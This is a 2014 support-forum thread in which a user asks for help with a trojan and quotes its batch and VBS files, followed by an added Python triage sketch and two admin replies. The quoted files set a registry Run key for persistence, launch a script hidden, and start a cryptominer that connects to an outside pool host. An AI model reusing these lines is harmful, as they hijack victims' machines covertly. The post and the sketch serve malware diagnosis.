KahunaPapa Posted August 6, 2014 ID:863295

Hello All,

My system was really slow one morning. Task manager showed that Internet Download Manager was running even though I never installed it. I found its location in "users/(my account)/appdata/roaming/adobe/flashplayer/purecache". It was taking quite a bit of the CPU. A search on the net showed that it was probably some kind of malware script that was running. It started itself every time I booted up in the morning through an entry in the registry. I don't know how long I've had it on my system.

The bat file that started it was:

    @echo off
    %windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v AdobeFlashPlayer /d "wscript \"%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs\" \"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat\"" /f
    start /b /normal "a" "%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" -o stratum+tcp://ns1.eaglecloud.su:9327 -u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x

The vbs script file in the same folder as the bat file was:

    CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

I have since removed all of the entries from my system, but am concerned about what may have been happening, as I don't know how long this has been on my system. I know this is a trojan of some kind. But could someone please interpret the bat and script files for me and what information these are sending to ns1.eaglecloud.su?

Thank you
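Added example, not part of the original posts: a Python triage sketch that reads the two command lines quoted above the way a responder would, flagging a Run-key value that starts a script host on files under a user-writable path and pulling the pool host, port, login and password out of the `stratum+tcp://` command line. It assumes `IDMan.exe` takes cpuminer-style `-o`/`-u`/`-p` options (pool URL, login, password); the function names are hypothetical.

```python
import re
import shlex

# Sample input: the two command lines quoted in the post above.
RUN_VALUE = (r'wscript "%appdata%\Adobe\Flash Player\PureCache\IDMan.vbs" '
             r'"%appdata%\Adobe\Flash Player\PureCache\IDMan.bat"')
MINER_CMD = (r'"%appdata%\Adobe\Flash Player\PureCache\IDMan.exe" '
             r'-o stratum+tcp://ns1.eaglecloud.su:9327 '
             r'-u LZA8F5DgmTCTbdUR1AXpnvuVVFEXbKxcNH -p x')

SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe"}
USER_WRITABLE = re.compile(r"%(appdata|localappdata|temp)%|\\appdata\\", re.I)
STRATUM = re.compile(r"^stratum\+(?:tcp|ssl)://([^:/\s]+):(\d+)$", re.I)

def split_cmd(cmd):
    # posix=False keeps backslashes in Windows paths; quotes are stripped here.
    return [t.strip('"') for t in shlex.split(cmd, posix=False)]

def check_run_value(value):
    """Flag an autorun value that starts a script host on user-writable files."""
    tokens = split_cmd(value)
    if not tokens:
        return None
    exe = tokens[0].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    scripts = [t for t in tokens[1:] if USER_WRITABLE.search(t)]
    if exe in SCRIPT_HOSTS and scripts:
        return {"host": exe, "scripts": scripts}
    return None

def parse_miner_args(cmd):
    """Extract pool, port, login and password (assumed cpuminer-style options)."""
    tokens = split_cmd(cmd)
    opts = {tokens[i]: tokens[i + 1] for i in range(len(tokens) - 1)
            if tokens[i] in ("-o", "-u", "-p")}
    m = STRATUM.match(opts.get("-o", ""))
    if not m:
        return None
    return {"image": tokens[0], "pool_host": m.group(1),
            "pool_port": int(m.group(2)),
            "login": opts.get("-u"), "password": opts.get("-p")}

if __name__ == "__main__":
    print(check_run_value(RUN_VALUE))
    print(parse_miner_args(MINER_CMD))
```

The parsed fields are the values the command line itself hands to the pool: a host and port, a login string and a password of `x`.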

Root Admin AdvancedSetup Posted August 22, 2014 ID:869793

Very sorry for the delay. The site has been very busy and there has been more demand for support than we were able to handle for a while there.

I'm just now getting back to see if you still need help or not. If you do, please reply back and let me know and I'll go ahead and assist you.

Thank you

Root Admin AdvancedSetup Posted September 23, 2014 ID:882149

Due to the lack of feedback this topic is closed to prevent others from posting here. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!